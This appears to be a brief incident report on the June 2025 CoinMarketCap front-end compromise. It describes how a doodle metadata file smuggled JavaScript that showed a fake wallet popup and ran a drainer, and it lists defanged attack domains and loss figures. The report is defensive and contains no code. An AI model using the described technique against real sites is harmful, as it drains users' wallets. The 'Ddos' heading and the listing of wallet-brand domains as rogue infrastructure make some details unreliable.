Ddos 
On June 20, 2025, CoinMarketCap (CMC)—a trusted name in the crypto ecosystem—fell victim to a highly coordinated client-side attack that weaponized a seemingly harmless “doodle” graphic to deliver malware through its own frontend infrastructure.
Visitors to CMC’s homepage were greeted with a fake popup, styled impeccably to match the site’s branding, urging them to “verify their wallets.” This social engineering lure, when acted upon, enabled wallet-draining scripts to interact with MetaMask, Phantom, and other popular wallets.
“The popups were not part of CMC’s legitimate features—they were the result of a client-side attack that hijacked the website’s frontend.”
Technical Breakdown: A Five-Stage Phishing Chain
CoinMarketCap is hacked… you will get drained!pic.twitter.com/cwSFQ0M0rg
— Dark Web Informer – Cyber Threat Intelligence (@DarkWebInformer) June 20, 2025
1. Initial Compromise: The Doodle Trap
An API request from CMC’s frontend (/doodle/get) fetched a JSON file that referenced a remote domain:
https://static.cdnkit[.]io/cmc/6855a83d80876056dab0a5cf.json
This file—masquerading as image metadata—included embedded JavaScript.
2. JavaScript Injection and Execution
The embedded code:
- Altered the DOM to hide real CMC elements
- Injected a script from blockassets[.]app
- Set a browser flag (window.cmcInjected) to ensure single execution
3. Fake Wallet Popup Deployment
The injected popup mimicked CMC UI and urged users to connect their wallets. Clicking the button triggered wallet access requests and phishing logic that adapted to different wallets.
4. Malicious Infrastructure
The attack relied on multiple rogue domains:
- cdnkit[.]io – initial JSON payload
- blockassets[.]app – main phishing scripts
- walletconnect[.]com, trustwallet[.]com – data exfiltration
The WHOIS records show these domains are not owned by CMC and have ties to past scam infrastructure.
5. Drainer Payload Activation
The script tricked users into signing token transfers, displaying fake error messages like “Your wallet is blacklisted” or “For security reasons we can’t allow you to connect an empty wallet.”
Screenshots from the attacker’s leaked control panel on Telegram (via “CommLeaks”) confirmed use of the Inferno Drainer malware and showed:
- 110 victims
- Total stolen: ~$43,266
- Dozens of active drainer scripts loaded per session
Donate